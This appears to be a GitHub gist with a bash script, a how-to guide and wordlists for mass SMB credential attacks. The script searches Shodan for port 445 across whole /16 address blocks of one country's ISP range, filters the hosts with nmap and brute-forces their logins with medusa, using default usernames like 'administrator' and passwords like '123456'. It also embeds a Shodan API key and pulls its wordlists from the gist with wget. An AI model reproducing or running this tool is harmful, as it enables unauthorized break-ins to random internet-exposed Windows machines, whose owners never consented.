Last active
June 29, 2019 18:13
-
-
Save pouriazareie/b5d3a2321747599a3a65edd8c929a400 to your computer and use it in GitHub Desktop.
pzscript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| unset get_num ;echo "Please enter in a number:" ;read get_num; if [[ ! `echo ${get_num} | tr '-' ' '` =~ ^((((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?) (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))))+$ ]] ;then echo "${get_num} isn't a number" ; else echo "${get_num} is a number" && sleep 5 && iprange=`echo ${get_num}` ; rm user.txt password.txt shodan.txt out.txt nmap.txt && sleep 5 && wget https://gist.githubusercontent.com/pouriazareie/b5d3a2321747599a3a65edd8c929a400/raw/7311e4f12bc6dc839d8b0621d5d4de12a3c15e7d/password.txt && wget https://gist.githubusercontent.com/pouriazareie/b5d3a2321747599a3a65edd8c929a400/raw/b77dc6b6b8ca34024c58a64527b344b752f1fa71/user.txt && sleep 1 && sudo apt-get update && pip install shodan && shodan init 0BF9d6blgU0zOV3rnScJtr4C5pRwSet9 && sudo apt-get install medusa -y && sudo apt-get install nmap -y && fp=`echo "$iprange" | cut -d. -f1` ;sp=`echo "$iprange" | cut -d. -f2` ; ep=`echo "$iprange" | cut -d. -f5` ; while [ $sp -le $ep ];do shodan search --fields ip_str,port:445 smb net:$fp.$sp.0.0/16 ;((sp++));done | tee -a shodan.txt && sort shodan.txt | awk '{$1=$1}1' | sed '/^$/d' | tee -a out.txt && nmap -Pn -T5 --open -p 445 -iL out.txt -oG - | grep "/open" | awk '{print $2}' | tee -a nmap.txt && medusa -w 0 -H nmap.txt -U user.txt -P password.txt -M smbnt -O finds.txt -T 16 && echo find this && clear && colorfind=`cat finds.txt | grep Allowed | cut -d " " -f1,2,5,7,9` && echo -e "\e[45m$colorfind\e[0m" ; fi |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 123456 | |
| 1 | |
| 123 | |
| 1234 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget https://gist.githubusercontent.com/pouriazareie/b5d3a2321747599a3a65edd8c929a400/raw/7311e4f12bc6dc839d8b0621d5d4de12a3c15e7d/password.txt && wget https://gist.githubusercontent.com/pouriazareie/b5d3a2321747599a3a65edd8c929a400/raw/b77dc6b6b8ca34024c58a64527b344b752f1fa71/user.txt | |
| # -----------------------------------> iprange=2.176.0.0 - 2.191.255.255 | |
| fp=2 #----------- first part of ipranges : 2 | |
| sp=176 #----------- start point of ipranges : 176 | |
| ep=191 #----------- start point of ipranges : 191 | |
| while [ $sp -le $ep ] | |
| do shodan search --fields ip_str,port:445 smb net:$fp.$sp.0.0/16 | |
| ((sp++)) | |
| done | tee -a shodan.txt | |
| sort shodan.txt | awk '{$1=$1}1' | sed '/^$/d' | tee -a out.txt | |
| nmap -Pn -T5 --open -p 445 -iL out.txt -oG - | grep "/open" | awk '{print $2}' | tee -a nmap.txt | |
| medusa -w 0 -H nmap.txt -U user.txt -P password.txt -M smbnt -O finds.txt -T 16 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *) search targets by shodan | |
| *) search shodan.txt by nmap (because if shodan database is not updates) | |
| *) brute force nmap output by medusa | |
| ------------------------------------------------------------------------------------------------------------------------------------------ | |
| You can manually run command or use easier way by writing a shell code | |
| ---------------------------------------------------------------------------------------------------------------------------------------- | |
| 1) first we must create shodan account to and get API KEY | |
| (open link and registered an account (you can login whit your google account) | |
| (follow me step by step) | |
| (after login go on my account tab and click it now copy API KEY) | |
| ______________________________________________________________________________ | |
| 2) choice on target or scan ip range (offer:use databse iprange country in nirsoft.net) | |
| im first sort ips by total ips in ISP then select iprange for example | |
| iprange=2.176.0.0 - 2.191.255.255 | |
| use cidr netmask=2.176.0.0/16 ===>>> (2.176.0.0 ~ 2.176.255.255) | |
| --------------------------------------------------------------------------------------------------------------------------------------------------- | |
| command: | |
| apt-get update | |
| apt-get install update | |
| apikey="0BF9d6blgU0zOV3rnScJtr4C5pRwSet9" | |
| pip install shodan && shodan init $apikey | |
| shodan search --fields ip_str,port:445 smb net:2.176.0.0/16 | tee -a "shodan.txt" | |
| sort shodan.txt | awk '{$1=$1}1' | sed '/^$/d' | tee -a "sort.txt" | |
| nmap -Pn -T5 --open -p 445 -iL "sort.txt" -oG - | grep "/open" | awk '{print $2}' | tee -a "nmap.txt" | |
| medusa -w 0 -H "nmap.txt" -U user1.txt -P p10.txt -M smbnt -O "find.txt" -T 16 | |
| _____________________________________________________________________________________- | |
| ----------------------------------------------------- | |
| iprange=2.176.0.0 - 2.191.255.255 | |
| iprange=2.$a.0.0 - 2.$b.255.255 | |
| ----------------------------------------------------- | |
| SHELL CODE | |
| -------------------------------------------------------- | |
| a=176 | |
| b=191 | |
| while [ $b -le $b ] | |
| do | |
| shodan search --fields ip_str,port:445 smb net:$a.$b.0.0/16 | |
| ((b++)) | |
| done | tee -a shodan.txt | |
| sort shodan.txt | awk '{$1=$1}1' | sed '/^$/d' | tee -a out.txt | |
| nmap -Pn -T5 --open -p 445 -iL out.txt -oG - | grep "/open" | awk '{print $2}' | tee -a nmap.txt | |
| medusa -w 0 -H nmap.txt -U user1.txt -P p10.txt -M smbnt -O finds.txt -T 16 | |
| ---------------------------------------------------------------------------------------------------- | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| administrator | |
| user | |
| user1 | |
| admin | |
| admin1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment